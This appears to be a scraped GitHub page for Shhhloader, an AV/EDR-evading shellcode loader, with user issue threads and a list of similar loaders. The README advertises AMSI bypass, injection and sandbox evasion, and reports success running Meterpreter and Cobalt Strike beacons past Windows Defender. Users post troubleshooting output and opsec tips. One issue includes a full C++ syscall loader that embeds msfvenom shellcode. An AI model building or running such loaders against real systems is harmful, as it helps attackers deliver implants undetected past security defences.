SysWhispers Shellcode Loader (Work in Progress)

Shhhloader

Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub that has been integrated with SysWhispers in order to bypass AV/EDR. The included python builder will work on any Linux system that has Mingw-w64 installed.

The tool has been confirmed to successfully load Meterpreter and a Cobalt Strike beacon on fully updated systems with Windows Defender enabled. The project itself is still in a PoC/WIP state, as it currently doesn't work with all payloads.

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us! 
┳┻|⊂ノ   
┻┳|
usage: Shhhloader.py [-h] [-a] [-o a.exe] file

ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER

positional arguments:
  file                  File containing raw shellcode

optional arguments:
  -h, --help            show this help message and exit
  -a, --amsi            Enable AMSI Bypass (Uses VirtualProtect, be careful!)
  -o a.exe, --outfile a.exe
                        Name of compiled file

Video Demo: https://www.youtube.com/watch?v=HE7L5R4iTOk

Features:

  • AMSI Bypass
  • Suspended Thread Injection (Credit: plackyhacker)
  • XOR Encryption with Dynamic Key Generation
  • Sandbox Evasion via Loaded DLL Enumeration

Tested and Confirmed Working on:

  • Windows 10 21H1 (10.0.19043)
  • Windows 10 20H2 (10.0.19042)
  • Windows Server 2019 (10.0.17763)

Scan Results as of 12/20/21 (x64 Meterpreter): https://antiscan.me/scan/new/result?id=sHLPmUo7li1n

Scan

Greetz & Credit:

Owner
icyguider
It's sipple out there!
icyguider
Comments
  • Error FAILED to allocate memory in the current process, exiting: c000000d

    Error FAILED to allocate memory in the current process, exiting: c000000d

    Hey. For me only ProcessHollow works as shellcode execution method.

    For all the other methods I receive an error while running the generated exe.

    Generating:

    python Shhhloader.py  -p notepad.exe    Payload.raw   -v
    
    ┳┻|
    ┻┳|
    ┳┻|
    ┻┳|
    ┳┻| _
    ┻┳| •.•)  - Shhhhh, AV might hear us!
    ┳┻|⊂ノ
    ┻┳|
    [+] ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER
    [+] Using notepad.exe for QueueUserAPC injection
    [+] Randomizing syscall names
    [+] Verbose messages enabled
    [+] Saved new stub to stub.cpp
    [+] Compiling new stub...
    [!] a.exe has been compiled successfully!
    

    Running:

    Please wait 60 seconds...
    Sandbox checks passed
    hiqPjIRXkVUORsAylux FAILED to allocate memory in the current process, exiting: c000000d
    

    :-(

    Injecting in explorer.exe or notepad.exe doesn't make a difference.

    Edit:

    I traced it down to syscall to NtAllocateVirtualMemory. The return value is:

    RAX 00000000C000000D STATUS_INVALID_PARAMETER

    Please help!

  • CurrentThread

    CurrentThread

    hi

    so i managed to only get a cobalt beacon back when using CurrentThread method. i am not sure why the other methods are not working. if you can explain the steps to help. you debug it i will be happy to assist.

    OS Name: Microsoft Windows 10 Enterprise OS Version: 10.0.18363 N/A Build 18363

  • GetSyscallStub not working

    GetSyscallStub not working

    Hi. I'm trying a Cobalt Strike (4.7) x64 stageless shellcode, and facing some issues against a Win10 machine with:

    • GetSyscallStub option. When used, I get no beacon
    • EnumDisplayMonitors or ModuleStomping options. When used, I get no beacon

    The only option that works for me is using default 'QueueUserAPC' without GetSyscallStub. Are you aware of these limitations or am I doing something wrong ? My AV is disabled for test purposes and I don't have any EDR either

    Thanks

  • llvm obfuscator cause error when compiling!

    llvm obfuscator cause error when compiling!

    First Thanks for your amazing work!

    The previous version was working fine but after the update it started to go wrong, I compiled the llvm following your installation tutorial! I tested if it was the llvm binaries to see if there was something wrong but everything was normal compile other .cpp files correctly Shhhloder1

    Shhhloder2 I am available to send any data or additional information

  • Unable to execute Mimikatz's shellcode

    Unable to execute Mimikatz's shellcode

    Hi, I've played around with the tool since its first release and I really must say that you and your contributors have done a really great job. The tool works fine with CS/Metasploit shellcodes, however it doesn't work with Mimikatz's shellcode (generated from Donut). It does compile successfully, but there is no output displayed when executed (no crashes at all, just no output). I've seen this type of behaviour on other tools as well, maybe it is because of the generated shellcode itself as it is 1.4 million bytes long 🤔

    Looking forward to your answer :)

  • x86_64-w64-mingw32-clang++: not found

    x86_64-w64-mingw32-clang++: not found

    +] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER [+] Storing shellcode as english word list [+] Using c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe for ModuleStomping [+] Using GetSyscallStub for syscalls [+] Using domain enumeration for sandbox evasion [+] Generating DLL instead of exe [+] Randomizing syscall names [+] Saved new stub to stub.cpp [+] Compiling new stub... [+] Using Obfuscator-LLVM to compile stub... sh: 1: x86_64-w64-mingw32-clang++: not found [!] Stub compilation failed! Something went wrong!

    Any suggestions?

  • OLLVM Errors

    OLLVM Errors

    Hey man,

    Getting some OLLVM errors, wonder if you have any tips?

    [+] Using Obfuscator-LLVM to compile stub...
    In file included from stub.cpp:4:
    In file included from /usr/x86_64-w64-mingw32/include/windows.h:69:
    In file included from /usr/x86_64-w64-mingw32/include/windef.h:9:
    In file included from /usr/x86_64-w64-mingw32/include/minwindef.h:163:
    In file included from /usr/x86_64-w64-mingw32/include/winnt.h:1555:
    In file included from /usr/bin/../lib/clang/14.0.6/include/x86intrin.h:15:
    In file included from /usr/bin/../lib/clang/14.0.6/include/immintrin.h:26:
    In file included from /usr/bin/../lib/clang/14.0.6/include/xmmintrin.h:3009:
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2378:19: error: use of undeclared identifier '__builtin_elementwise_max'
      return (__m128i)__builtin_elementwise_max((__v8hi)__a, (__v8hi)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2398:19: error: use of undeclared identifier '__builtin_elementwise_max'
      return (__m128i)__builtin_elementwise_max((__v16qu)__a, (__v16qu)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2418:19: error: use of undeclared identifier '__builtin_elementwise_min'
      return (__m128i)__builtin_elementwise_min((__v8hi)__a, (__v8hi)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2438:19: error: use of undeclared identifier '__builtin_elementwise_min'
      return (__m128i)__builtin_elementwise_min((__v16qu)__a, (__v16qu)__b);
    

    Thanks!

  • python2 conversion

    python2 conversion

    Hi there! I am running your script in a py2 environment which I had to change the following line into this:

    test = ''.join(chr(ord(test) ^ ord(key[i])))
    

    which breaks every thing. Do you have any opinion on this? Cheers!

  • Recommendations

    Recommendations

    Strip debug information from the binary for opsec and size reduction: x86_64-w64-mingw32-strip --strip-all

    Add skCrypter.h headers and wrap the key with skCrypt("key") so that it is not a plaintext string: https://github.com/skadro-official/skCrypter

  • msfvenom alternatives [question]

    msfvenom alternatives [question]

    Hi @icyguider ! hope you are doing well. I am re-creating a tool like msfvenom using python, and in the process I am dealing with some problems related to the design complexity of msfvenom. Do you have any suggestion for me on open-source stuff which would help me achieve such a task? I have already seen projects such as Veil or OWASP ZSC, but these tools are not active any more. Cheers!

  • win7 sp1 or windows server 2008 Test failed can you help me?

    win7 sp1 or windows server 2008 Test failed can you help me?

    • os: Windows 7 sp 1
    //generate payload
    msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
    //source code
    
    #define _WIN32_WINNT 0x0600
    #include <iostream>
    #include <windows.h>
    #include <psapi.h>
    #include <winternl.h>
    #include <tlhelp32.h>
    #include "Syscalls2.h"
    #ifndef UNICODE  
    typedef std::string String;
    #else
    typedef std::wstring String;
    #endif
    
    
    unsigned char shellcode[276] = {
    0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,
    0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,
    0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,
    0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,
    0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,
    0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,
    0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,
    0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,
    0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,
    0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,
    0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,
    0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,
    0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,
    0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,
    0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,
    0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,
    0xDA,0xFF,0xD5,0x63,0x61,0x6C,0x63,0x2E,
    0x65,0x78,0x65,0x00,
    };
    
    int main()
    {
        
        HANDLE hProc = GetCurrentProcess();
        DWORD oldprotect = 0;
        PVOID base_addr = NULL;
        HANDLE thandle = NULL;
        SIZE_T bytesWritten;
        size_t shellcodeSize = sizeof(shellcode) / sizeof(shellcode[0])+1;
        NTSTATUS res = NtAllocateVirtualMemory(hProc, &base_addr, 0, (PSIZE_T)&shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (res != 0){
            std::cout << "NtAllocateVirtualMemory FAILED to allocate memory in the current process, exiting: " << std::hex << res << std::endl;
            return 0;
        }
        else {
            std::cout << "NtAllocateVirtualMemory allocated memory in the current process sucessfully." << std::endl;
        }
        res = NtWriteVirtualMemory(hProc, base_addr, shellcode, shellcodeSize, &bytesWritten);
        if (res != 0){
            std::cout << "NtWriteVirtualMemory FAILED to write decoded payload to allocated memory: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtWriteVirtualMemory wrote decoded payload to allocated memory successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_NOACCESS, &oldprotect);
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, TRUE, 0, 0, 0, NULL);
    
        if (res != 0){
            std::cout << "NtCreateThreadEx FAILED to create thread in current process: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtCreateThreadEx created thread in current process successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_EXECUTE_READ, &oldprotect);
    
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtResumeThread(thandle, 0);
        if (res != 0){
            std::cout << "NtResumeThread FAILED to resume created thread: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtResumeThread resumed created thread successfully." << std::endl;
        }
        res = NtWaitForSingleObject(thandle, -1, NULL);   
    }
    //build
    x86_64-w64-mingw32-g++ stub.cpp -w -masm=intel -fpermissive -static -lpsapi -Wl,--subsystem,console -o a.exe
    

    The test is successful in win7 and above

    The output of win7 or windows 2008 is as follows

    NtAllocateVirtualMemory allocated memory in the current process sucessfully.
    NtWriteVirtualMemory wrote decoded payload to allocated memory successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtCreateThreadEx created thread in current process successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtResumeThread FAILED to resume created thread: c0000022
    
X11 file manager (work in progress)

xfiles This is a still incomplete file manager for X11. It can only navigate through directories, select files (and do nothing with them), call a sc

Dec 20, 2022
Emergency alert and tracer for realtime high-performance computing app (work in progress, currently supported env is only Linux x86-64).

HPC Emerg Emergency alert and tracer for realtime high-performance computing app (work in progress, currently supported env is only Linux x86-64). Exa

Jan 19, 2022
Matryoshka loader is a tool that red team operators can leverage to generate shellcode for Microsoft Office document phishing payloads.

Overview Matryoshka loader is a tool that red team operators can leverage to generate shellcode for an egghunter to bypass size-limitations and perfor

Dec 15, 2022
Evasive shellcode loader for bypassing event-based injection detection (PoC)
Evasive shellcode loader for bypassing event-based injection detection (PoC)

(cleaned up version here: https://github.com/xinbailu/DripLoader-Ops) DripLoader (PoC) Evasive shellcode loader for bypassing event-based injection de

Dec 28, 2022
Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode

Hellsgate Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode Features: Using Syscalls from Hellsgate tech loading the shell

Nov 5, 2021
Shellcode loader written in rust. Strives to evade modern EDR solutions.

Pestilence What is pestilence? Pestilence is a shellcode loader written in rust. It strives to evade modern EDR solutions. How does it work? It loads

Dec 5, 2022
Evasive shellcode loader for bypassing event-based injection detection (PoC)
Evasive shellcode loader for bypassing event-based injection detection (PoC)

DripLoader (PoC) Evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection. The project

Dec 28, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Dec 20, 2022
A modern-day Boss Key software tool. Switch instantly from work to play & play to work with Bosky.

Bosky By: Seanpm2001, Bosky-dev Et; Al. Top README.md Read this article in a different language Sorted by: A-Z Sorting options unavailable ( af Afrika

Sep 10, 2022
An in-progress matching decompilation of Final Fantasy VII For the PSX.

FFVII An in-progress decompilation of the original US release of Final Fantasy VII on the PSX. Building (Linux) Install build dependencies The build p

Dec 14, 2022
An in-progress decompilation of the 1.1 US release of Silent Hill on the Playstation 1.

Silent Hill Decompilation Project An in-progress decompilation of the 1.1 US release of Silent Hill on the Playstation 1. Building (Linux) Install bui

Dec 25, 2022
Text - A spicy text library for C++ that has the explicit goal of enabling the entire ecosystem to share in proper forward progress towards a bright Unicode future.

ztd.text Because if text works well in two of the most popular systems programming languages, the entire world over can start to benefit properly. Thi

Dec 25, 2022
Library with useful output stream tools like: color and style manipulators, progress bars and terminal graphics.
Library with useful output stream tools like: color and style manipulators, progress bars and terminal graphics.

Library with useful output stream tools like: color and style manipulators, progress bars and terminal graphics Table of contents Introduction Documen

Dec 20, 2022
A (sub) C compiler working in progress.

acc A zero-dependence (sub) C compiler working in progress written in pure ISO C. Build from source Make sure you have gcc and cmake on your PATH. If

May 16, 2022
PoC MSVC COFF Object file loader/injector.

COFFInjector A Proof of Concept code - loading and injecting MSVC object file. Blog post with explanation: https://0xpat.github.io/Malware_development

Dec 28, 2022
A python script loader for Grand Theft Auto San Andreas

PyLoader Introduction This is a .asi plugin that allows writing custom Python scripts for GTA SanAndreas. This plugin is still in the early stages of

Nov 28, 2022
An implementation of a Windows loader that can load dynamic-linked libraries (DLLs) directly from memory

memory-module-loader memory-module-loader is an implementation of a Windows loader that can load dynamic-link libraries (DLLs) directly from memory. T

Nov 21, 2022
Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.
Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.

Cobalt Strike User-Defined Reflective Loader Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities. B

Jan 3, 2023
Mod Loader for CMD with Multithreading Support

简介 cocmd 工具通过在进程空间中加载多个 cmd.dll 实例实现了真正意义上的多线程执行批处理脚本 其中 cmd.dll 修改自 Win7 SP1 中的 32 位 cmd.exe 不同于 start /b 的启动方式,因为环境变量和进程环境是绑定的,所以多个脚本线程间可以实时共享变量以及 G

Sep 10, 2021